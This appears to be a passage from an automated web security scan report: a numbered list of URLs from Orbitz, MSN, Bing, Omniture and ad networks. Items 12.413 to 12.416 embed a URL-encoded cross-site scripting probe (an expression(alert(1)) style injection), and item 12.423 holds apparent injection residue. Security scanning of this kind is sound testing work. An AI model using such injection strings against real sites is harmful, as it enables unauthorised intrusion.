12.337. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s11877967668697

12.338. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

12.339. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s17696109912358

12.340. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s21560784257017

12.341. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23100360115058

12.342. http://omniture.d1.sc.omtrdc.net/b/ss/omniturecom,omnitureall,omniturecomdev,omniturecomemea,omnitureapac,omniturenoncustomer,omniturecomen/1/H.19.3/s23355576898902

12.343. https://omniturebanners.112.2o7.net/b/ss/omniturebanners/1/H.9--NS/0

12.344. http://omtrdc.net/

12.345. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

12.346. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

12.347. http://orbitz.com/

12.348. http://ow.ly/1aWWoA

12.349. http://pingomatic.com/ping/

12.350. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.351. http://pix04.revsci.net/F08747/b3/0/3/1003161/102504215.js

12.352. http://pix04.revsci.net/F08747/b3/0/3/1003161/1084292.js

12.353. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

12.354. http://pix04.revsci.net/F08747/b3/0/3/1003161/114261376.js

12.355. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

12.356. http://pix04.revsci.net/F08747/b3/0/3/1003161/118073152.js

12.357. http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js

12.358. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

12.359. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js

12.360. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

12.361. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js

12.362. http://pix04.revsci.net/F08747/b3/0/3/1003161/157224151.js

12.363. http://pix04.revsci.net/F08747/b3/0/3/1003161/164892384.js

12.364. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

12.365. http://pix04.revsci.net/F08747/b3/0/3/1003161/213412415.js

12.366. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

12.367. http://pix04.revsci.net/F08747/b3/0/3/1003161/268190583.js

12.368. http://pix04.revsci.net/F08747/b3/0/3/1003161/310338891.js

12.369. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

12.370. http://pix04.revsci.net/F08747/b3/0/3/1003161/364341298.js

12.371. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

12.372. http://pix04.revsci.net/F08747/b3/0/3/1003161/36740428.js

12.373. http://pix04.revsci.net/F08747/b3/0/3/1003161/374759838.js

12.374. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

12.375. http://pix04.revsci.net/F08747/b3/0/3/1003161/410748832.js

12.376. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

12.377. http://pix04.revsci.net/F08747/b3/0/3/1003161/449293090.js

12.378. http://pix04.revsci.net/F08747/b3/0/3/1003161/536378960.js

12.379. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

12.380. http://pix04.revsci.net/F08747/b3/0/3/1003161/555347891.js

12.381. http://pix04.revsci.net/F08747/b3/0/3/1003161/591799300.js

12.382. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

12.383. http://pix04.revsci.net/F08747/b3/0/3/1003161/605657366.js

12.384. http://pix04.revsci.net/F08747/b3/0/3/1003161/664658967.js

12.385. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

12.386. http://pix04.revsci.net/F08747/b3/0/3/1003161/669682607.js

12.387. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

12.388. http://pix04.revsci.net/F08747/b3/0/3/1003161/686809393.js

12.389. http://pix04.revsci.net/F08747/b3/0/3/1003161/70794208.js

12.390. http://pix04.revsci.net/F08747/b3/0/3/1003161/715159401.js

12.391. http://pix04.revsci.net/F08747/b3/0/3/1003161/72215668.js

12.392. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

12.393. http://pix04.revsci.net/F08747/b3/0/3/1003161/725558049.js

12.394. http://pix04.revsci.net/F08747/b3/0/3/1003161/737191144.js

12.395. http://pix04.revsci.net/F08747/b3/0/3/1003161/769036262.js

12.396. http://pix04.revsci.net/F08747/b3/0/3/1003161/814275397.js

12.397. http://pix04.revsci.net/F08747/b3/0/3/1003161/844309645.js

12.398. http://pix04.revsci.net/F08747/b3/0/3/1003161/868788633.js

12.399. http://pix04.revsci.net/F08747/b3/0/3/1003161/869604030.js

12.400. http://pix04.revsci.net/F08747/b3/0/3/1003161/887063996.js

12.401. http://pix04.revsci.net/F08747/b3/0/3/1003161/934643839.js

12.402. http://pixel.invitemedia.com/data_sync

12.403. http://pixel.mathtag.com/event/js

12.404. http://pixel.quantserve.com/pixel/p-78V15bIOxaPIs.gif

12.405. http://price.orbitz.com/

12.406. http://px.admonkey.dapper.net/PixelMonkey

12.407. http://r.casalemedia.com/j.gif

12.408. http://r.openx.net/set

12.409. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas/

12.410. http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=25807272=_4d482560,1483511146,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=25807272&siteValue=0000747145&city=Dallas/

12.411. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000918410/bnum=29104868/cstr=29104868=_4d482547,0572256108,749715^918410^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AScb47c603bd494ad09cac82f8e21e47bc

12.412. http://r1-ads.ace.advertising.com/click/site=0000749715/mnum=0000964772/bnum=10533267/cstr=10533267=_4d48255e,5052657456,749715^964772^1183^0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=ASda8e1ea7652d4c0992c679c6d2b63588

12.413. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=11479363/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.414. http://r1-ads.ace.advertising.com/site=747145/size=300250/u=2/bnum=25807272/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.415. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=10533267/hr=9/hl=1/c=2/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%253Aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.416. http://r1-ads.ace.advertising.com/site=749715/size=160600/u=2/bnum=29104868/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.orbitz.com%252FApp%252FPerformMDLPDealsContent%253Fdeal_id%253Dpromotions%2526cnt%253DPRO%2526type%253Doa_qs35daf%252522style%25253d%252522x%25253aexpression%2528alert%25281%2529%2529%2525221333ba1041f

12.417. http://realestate.msn.com/

12.418. http://realestate.msn.com/slideshow.aspx

12.419. http://sales.liveperson.net/hc/15744040/

12.420. http://sales.liveperson.net/hc/15744040/

12.421. http://scholar.google.com/scholar

12.422. http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php

12.423. http://search.aol.com/%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C

12.424. http://segment-pixel.invitemedia.com/set_partner_uid

12.425. http://segment-pixel.invitemedia.com/setuid

12.426. http://showads.pubmatic.com/AdServer/AdServerServlet

12.427. http://showads.pubmatic.com/AdServer/AdServerServlet

12.428. http://showads.pubmatic.com/AdServer/AdServerServlet

12.429. http://showads.pubmatic.com/AdServer/AdServerServlet

12.430. http://showads.pubmatic.com/AdServer/AdServerServlet

12.431. http://showads.pubmatic.com/AdServer/AdServerServlet

12.432. http://showads.pubmatic.com/AdServer/AdServerServlet

12.433. http://showads.pubmatic.com/AdServer/AdServerServlet

12.434. http://sitelife.ehow.com/ver1.0/Direct/Process

12.435. https://sitesearch.omniture.com/center/

12.436. http://social.entertainment.msn.com/bloglist.aspx

12.437. http://social.entertainment.msn.com/movies/blogs/the-hitlist-blog.aspx

12.438. http://social.entertainment.msn.com/tv/blogs/reality-tv-blog.aspx

12.439. http://sorry.google.com/sorry/

12.440. http://sorry.google.com/sorry/Captcha

12.441. http://specials.msn.com/A-List/Entertainment/Ali-Larters-baby-story.aspx

12.442. http://specials.msn.com/A-List/Entertainment/Britney-Spears-as-maid-of-honor.aspx

12.443. http://specials.msn.com/A-List/Entertainment/Famous-young-fashionistas.aspx

12.444. http://specials.msn.com/A-List/Entertainment/Hip-hop-pioneer-hospitalized.aspx

12.445. http://specials.msn.com/A-List/Entertainment/Javier-Bardem-as-Bond.aspx

12.446. http://specials.msn.com/A-List/Entertainment/Most-wanted-celebrity-body-parts.aspx

12.447. http://specials.msn.com/A-List/Entertainment/New-Superman-chosen.aspx

12.448. http://specials.msn.com/A-List/Entertainment/Ozzy-cancels-Reno-show.aspx

12.449. http://specials.msn.com/A-List/Lifestyle/African-American-History.aspx

12.450. http://specials.msn.com/A-List/Lifestyle/Best-home-remedies.aspx

12.451. http://specials.msn.com/A-List/Lifestyle/January-2011-quotes-of-the-month.aspx

12.452. http://specials.msn.com/A-List/Lifestyle/Man-jailed-for-defecating-in-store.aspx

12.453. http://specials.msn.com/A-List/Lifestyle/Monk-charged-under-anti-smoking-law.aspx

12.454. http://specials.msn.com/A-List/Lifestyle/No-bail-for-mom-who-killed-kids.aspx

12.455. http://specials.msn.com/A-List/Lifestyle/Police-break-up-fight-at-N.C.-church.aspx

12.456. http://specials.msn.com/A-List/Lifestyle/Sled-dogs-slaughtered.aspx

12.457. http://specials.msn.com/A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx

12.458. http://specials.msn.com/IEIncreaseFont_preview.aspx

12.459. http://specials.msn.com/alphabet.aspx

12.460. http://sync.mathtag.com/sync/img

12.461. http://t.invitemedia.com/track_imp

12.462. http://tags.bluekai.com/site/1463

12.463. http://tags.bluekai.com/site/2748

12.464. http://track.roiservice.com/track/LogToDb.asp.aspx

12.465. http://track.roiservice.com/track/track.aspx

12.466. http://tracking.tree.com/trk/npv-event.gif

12.467. http://tracking.tree.com/trk/pv.gif

12.468. http://translate.google.com/translate_t

12.469. http://tv.msn.com/

12.470. http://tv.msn.com/last-night-on-tv/

12.471. http://tv.msn.com/tv/article.aspx

12.472. http://video.google.com/videosearch

12.473. http://vs.dmtracker.com/tags/vs.js

12.474. http://w.ic.tynt.com/b/o

12.475. http://wp-superslider.com/

12.476. http://wp-superslider.com/index.php

12.477. http://www.addthis.com/bookmark.php

12.478. http://www.astaro.org/

12.479. http://www.away.com/

12.480. http://www.bing.com/

12.481. http://www.bing.com/images/results.aspx

12.482. http://www.bing.com/local/ypdefault.aspx

12.483. http://www.bing.com/maps/

12.484. http://www.bing.com/maps/default.aspx

12.485. http://www.bing.com/maps/explore/

12.486. http://www.bing.com/news/results.aspx

12.487. http://www.bing.com/news/search

12.488. http://www.bing.com/news/search

12.489. http://www.bing.com/results.aspx

12.490. http://www.bing.com/search

12.491. http://www.bing.com/shopping

12.492. http://www.bing.com/shopping/pet-beds/c/5533

12.493. http://www.bing.com/shopping/photo-storage-presentation/search

12.494. http://www.bing.com/shopping/search

12.495. http://www.bing.com/shopping/televisions/c/4724

12.496. http://www.bing.com/shopping/valentines-day-gift-ideas/r/144

12.497. http://www.bing.com/shopping/womens-workout-clothing/r/146

12.498. http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do

12.499. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

12.500. http://www.bing.com/travel/hotels

12.501. http://www.bing.com/videos/browse

12.502. http://www.bing.com/videos/results.aspx

12.503. http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j

12.504. http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj

12.505. http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7

12.506. http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv

12.507. http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k

12.508. http://www.capitalone.com/creditcards/orbitz/index.php

12.509. http://www.cheaptickets.com/

12.510. http://www.demandstudios.com/ehow-writers.html

12.511. http://www.digitalia.be/

12.512. http://www.ehow.com/

12.513. http://www.evow.com/

12.514. http://www.facebook.com/

12.515. http://www.facebook.com/btaylor

12.516. http://www.facebook.com/careers/

12.517. http://www.facebook.com/directory/pages/

12.518. http://www.facebook.com/directory/people/

12.519. http://www.facebook.com/help/

12.520. http://www.facebook.com/ligatt

12.521. http://www.facebook.com/privacy/explanation.php

12.522. https://www.facebook.com/login.php

12.523. http://www.google.com/finance

12.524. http://www.google.com/setprefs

12.525. https://www.google.com/accounts/Login

12.526. http://www.lodging.com/

12.527. http://www.msn.com/

12.528. http://www.omniture.com/

12.529. http://www.omniture.com/de

12.530. http://www.omniture.com/en

12.531. http://www.omniture.com/en/

12.532. http://www.omniture.com/en/community

12.533. http://www.omniture.com/en/community/blogs

12.534. http://www.omniture.com/en/community/events

12.535. http://www.omniture.com/en/community/usergroups

12.536. http://www.omniture.com/en/company/adobe_faq

12.537. http://www.omniture.com/en/company/analyst_insight

12.538. http://www.omniture.com/en/company/customers

12.539. http://www.omniture.com/en/company/press_room

12.540. http://www.omniture.com/en/company/press_room/awards

12.541. http://www.omniture.com/en/company/press_room/news

12.542. http://www.omniture.com/en/company/press_room/press_releases

12.543. http://www.omniture.com/en/contact

12.544. http://www.omniture.com/en/contact/company

12.545. http://www.omniture.com/en/contact/email

12.546. http://www.omniture.com/en/contact/feedback

12.547. http://www.omniture.com/en/contact/offices

12.548. http://www.omniture.com/en/contact/sales

12.549. http://www.omniture.com/en/contact/support

12.550. http://www.omniture.com/en/education

12.551. http://www.omniture.com/en/education/academic_initiative

12.552. http://www.omniture.com/en/education/certification

12.553. http://www.omniture.com/en/education/certification/implementation

12.554. http://www.omniture.com/en/education/certification/insight_analyst

12.555. http://www.omniture.com/en/education/certification/insight_architect

12.556. http://www.omniture.com/en/education/certification/search_center

12.557. http://www.omniture.com/en/education/certification/site_catalyst

12.558. http://www.omniture.com/en/education/certification/support

12.559. http://www.omniture.com/en/education/certification/test_target

12.560. http://www.omniture.com/en/education/courses

12.561. http://www.omniture.com/en/education/courses/discover

12.562. http://www.omniture.com/en/education/courses/dop_analyst

12.563. http://www.omniture.com/en/education/courses/merchandising

12.564. http://www.omniture.com/en/education/courses/online_marketing_suite

12.565. http://www.omniture.com/en/education/courses/sbu

12.566. http://www.omniture.com/en/education/courses/searchcenter

12.567. http://www.omniture.com/en/education/courses/sitesearch

12.568. http://www.omniture.com/en/education/courses/survey

12.569. http://www.omniture.com/en/education/courses/testandtarget

12.570. http://www.omniture.com/en/partners

12.571. http://www.omniture.com/en/partners/apply

12.572. http://www.omniture.com/en/partners/portal

12.573. http://www.omniture.com/en/partners/showcase

12.574. http://www.omniture.com/en/privacy

12.575. http://www.omniture.com/en/privacy/2o7

12.576. http://www.omniture.com/en/privacy/policy

12.577. http://www.omniture.com/en/privacy/product

12.578. http://www.omniture.com/en/privacy/visualsciences

12.579. http://www.omniture.com/en/privacy/visualsciences/policy

12.580. http://www.omniture.com/en/privacy/visualsciences/resources

12.581. http://www.omniture.com/en/privacy/visualsciences/terms

12.582. http://www.omniture.com/en/product_tours/form

12.583. http://www.omniture.com/en/products/conversion

12.584. http://www.omniture.com/en/products/conversion/merchandising

12.585. http://www.omniture.com/en/products/conversion/publish

12.586. http://www.omniture.com/en/products/conversion/recommendations

12.587. http://www.omniture.com/en/products/conversion/searchandpromote

12.588. http://www.omniture.com/en/products/conversion/survey

12.589. http://www.omniture.com/en/products/conversion/testandtarget

12.590. http://www.omniture.com/en/products/conversion/testandtarget11

12.591. http://www.omniture.com/en/products/marketing_integration/closed_loop_marketing

12.592. http://www.omniture.com/en/products/marketing_integration/genesis

12.593. http://www.omniture.com/en/products/marketing_integration/genesis/applications

12.594. http://www.omniture.com/en/products/multichannel_analytics

12.595. http://www.omniture.com/en/products/multichannel_analytics/insight

12.596. http://www.omniture.com/en/products/multichannel_analytics/insight_retail

12.597. http://www.omniture.com/en/products/online_analytics

12.598. http://www.omniture.com/en/products/online_analytics/digitalpulse

12.599. http://www.omniture.com/en/products/online_analytics/discover

12.600. http://www.omniture.com/en/products/online_analytics/sitecatalyst

12.601. http://www.omniture.com/en/products/online_business_optimization

12.602. http://www.omniture.com/en/products/online_marketing_suite

12.603. http://www.omniture.com/en/products/open_business_analytics_platform

12.604. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse

12.605. http://www.omniture.com/en/products/tours

12.606. http://www.omniture.com/en/products/visitor_acquisition

12.607. http://www.omniture.com/en/products/visitor_acquisition/searchcenter

12.608. http://www.omniture.com/en/resources

12.609. http://www.omniture.com/en/resources/articles

12.610. http://www.omniture.com/en/resources/case_studies

12.611. http://www.omniture.com/en/resources/cmo.com

12.612. http://www.omniture.com/en/resources/guides

12.613. http://www.omniture.com/en/resources/testimonials

12.614. http://www.omniture.com/en/resources/webinars

12.615. http://www.omniture.com/en/services

12.616. http://www.omniture.com/en/services/consulting

12.617. http://www.omniture.com/en/services/es

12.618. http://www.omniture.com/en/survey/5084

12.619. http://www.omniture.com/en/surveys

12.620. http://www.omniture.com/es

12.621. http://www.omniture.com/fr

12.622. http://www.omniture.com/jp

12.623. http://www.omniture.com/ko

12.624. http://www.omniture.com/offer/100

12.625. http://www.omniture.com/offer/101

12.626. http://www.omniture.com/offer/102

12.627. http://www.omniture.com/offer/107

12.628. http://www.omniture.com/offer/108

12.629. http://www.omniture.com/offer/158

12.630. http://www.omniture.com/offer/162

12.631. http://www.omniture.com/offer/17

12.632. http://www.omniture.com/offer/170

12.633. http://www.omniture.com/offer/186

12.634. http://www.omniture.com/offer/187

12.635. http://www.omniture.com/offer/191

12.636. http://www.omniture.com/offer/285

12.637. http://www.omniture.com/offer/286

12.638. http://www.omniture.com/offer/291

12.639. http://www.omniture.com/offer/301

12.640. http://www.omniture.com/offer/303

12.641. http://www.omniture.com/offer/323

12.642. http://www.omniture.com/offer/331

12.643. http://www.omniture.com/offer/335

12.644. http://www.omniture.com/offer/337

12.645. http://www.omniture.com/offer/357

12.646. http://www.omniture.com/offer/372

12.647. http://www.omniture.com/offer/400

12.648. http://www.omniture.com/offer/411

12.649. http://www.omniture.com/offer/412

12.650. http://www.omniture.com/offer/413

12.651. http://www.omniture.com/offer/427

12.652. http://www.omniture.com/offer/429

12.653. http://www.omniture.com/offer/435

12.654. http://www.omniture.com/offer/462

12.655. http://www.omniture.com/offer/704

12.656. http://www.omniture.com/offer/892

12.657. http://www.omniture.com/offer/987

12.658. http://www.omniture.com/offer/989

12.659. http://www.omniture.com/press/867

12.660. http://www.omniture.com/press/868

12.661. http://www.omniture.com/privacy/2o7

12.662. http://www.omniture.com/zh

12.663. http://www.orbitz.com/

12.664. http://www.orbitz.com/App/DPTLandingPageSearch

12.665. http://www.orbitz.com/App/DisplayCarSearch

12.666. http://www.orbitz.com/App/GDDC

12.667. http://www.orbitz.com/App/Home

12.668. http://www.orbitz.com/App/InitDealEdit

12.669. http://www.orbitz.com/App/PartnerTracking

12.670. http://www.orbitz.com/App/PerformMDLPDealsContent

12.671. http://www.orbitz.com/App/PrepareActivitiesHome

12.672. http://www.orbitz.com/App/PrepareDealsHome

12.673. http://www.orbitz.com/App/PrepareFlightsTab

12.674. http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp

12.675. http://www.orbitz.com/App/PrepareSearchResult

12.676. http://www.orbitz.com/App/PrepareVacationsHome

12.677. http://www.orbitz.com/App/Sitemap

12.678. http://www.orbitz.com/App/SubmitQuickSearch

12.679. http://www.orbitz.com/App/ViewDHTMLCalendar

12.680. http://www.orbitz.com/App/ViewHotelSearch

12.681. http://www.orbitz.com/App/ViewMyAccount

12.682. http://www.orbitz.com/App/ViewRSSHelpPage

12.683. http://www.orbitz.com/App/ViewRoundTripSearch

12.684. http://www.orbitz.com/App/ViewTravelWatchHome

12.685. http://www.orbitz.com/Secure/DelayedRegistration

12.686. http://www.orbitz.com/Secure/DelayedSignIn

12.687. http://www.orbitz.com/Secure/PerformDisplayMyTrips

12.688. http://www.orbitz.com/Secure/PrepareMemberPreferences

12.689. http://www.orbitz.com/Secure/SignOut

12.690. http://www.orbitz.com/Secure/ViewNewMemberReg

12.691. http://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

12.692. http://www.orbitz.com/cacheable/ad.html

12.693. http://www.orbitz.com/cacheable/ad_empty.html

12.694. http://www.orbitz.com/cacheable/empty.html

12.695. http://www.orbitz.com/content/www/orb/rss/flightdeals.rss.xml

12.696. http://www.orbitz.com/pagedef/content/legal/bestPriceGuarantee.jsp

12.697. http://www.orbitz.com/public/ANS/Orbitz/html/PackageSave30_012411.xml

12.698. http://www.orbitz.com/shared/adserverProxy.jsp

12.699. http://www.orbitz.com/shared/css/DPTLiteDetails.css.jsp

12.700. http://www.orbitz.com/shared/css/calendar.css.jsp

12.701. http://www.orbitz.com/shared/css/dealsOrbot.css.jsp

12.702. http://www.orbitz.com/shared/css/dialog.css.jsp

12.703. http://www.orbitz.com/shared/css/global.css.jsp

12.704. http://www.orbitz.com/shared/css/homepage.css.jsp

12.705. http://www.orbitz.com/shared/js/behaviors.js

12.706. http://www.orbitz.com/shared/js/bot.js

12.707. http://www.orbitz.com/shared/js/cookie.js

12.708. http://www.orbitz.com/shared/js/deals.js

12.709. http://www.orbitz.com/shared/js/destinationDetails.js

12.710. http://www.orbitz.com/shared/js/global.js

12.711. http://www.orbitz.com/shared/js/lib/dialog.js

12.712. http://www.orbitz.com/shared/js/lib/prototype.js

12.713. http://www.orbitz.com/shared/js/lib/prototypeExtensions.js

12.714. http://www.orbitz.com/shared/js/lib/scriptaculous/src/builder.js

12.715. http://www.orbitz.com/shared/js/lib/scriptaculous/src/controls.js

12.716. http://www.orbitz.com/shared/js/lib/scriptaculous/src/dragdrop.js

12.717. http://www.orbitz.com/shared/js/lib/scriptaculous/src/effects.js

12.718. http://www.orbitz.com/shared/js/lib/scriptaculous/src/scriptaculous.js

12.719. http://www.orbitz.com/shared/js/lib/scriptaculous/src/slider.js

12.720. http://www.orbitz.com/shared/js/lib/scriptaculous/src/sound.js

12.721. http://www.orbitz.com/shared/js/tracking/webtrends.js

12.722. http://www.orbitz.com/shared/js/vendor/tealeaf.js

12.723. http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp

12.724. http://www.orbitz.com/shared/pagedef/content/dp/twoOrMoreRoomsPopup.jsp

12.725. http://www.orbitz.com/shared/pagedef/content/legal/lowFarePromise.jsp

12.726. http://www.orbitz.com/shop/hotelsearch

12.727. http://www.orbitz.com/site/js/jsAllTeaLeaf.js

12.728. http://www.orbitz.com/tealeaf.jsp

12.729. http://www.orbitz.com/tealeaf.jsp

12.730. https://www.orbitz.com/App/PartnerTracking

12.731. https://www.orbitz.com/App/ViewMyAccount

12.732. https://www.orbitz.com/Secure/SignIn

12.733. https://www.orbitz.com/Secure/ViewSecureCalendar

12.734. https://www.orbitz.com/Secure/ViewSetupCareAlertsProfile

12.735. http://www.orbitzforagents.com/

12.736. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting

12.737. http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

12.738. http://www.parentsconnect.com/eat/index.jhtml

12.739. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&

12.740. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.741. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.742. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.743. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.744. http://www.revresda.com/js.ng/channel=deals&Section=main&adsize=728x90_top&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&height=90&width=728&adType=noframe&

12.745. http://www.revresda.com/js.ng/channel=deals&Section=promo_activities&adsize=sponsorlogo&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=noframe&

12.746. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.747. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=1&

12.748. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=2&

12.749. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=3&

12.750. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=1&width=1&adType=noframe&pos=4&

12.751. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&

12.752. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=60&width=468&adType=noframe&

12.753. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=150&width=519&adType=noframe&

12.754. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=90&width=728&adType=noframe&

12.755. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=left&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

12.756. http://www.revresda.com/js.ng/site=orbitz&Section=flightstatus&adsize=300x250&pos=right&Params.richmedia=&channel=travelerupdate&dest=&sessionID=50cd97fbd27584ff66dda9b41d9d34e0&CookieName=OSC&tile=12966613625991

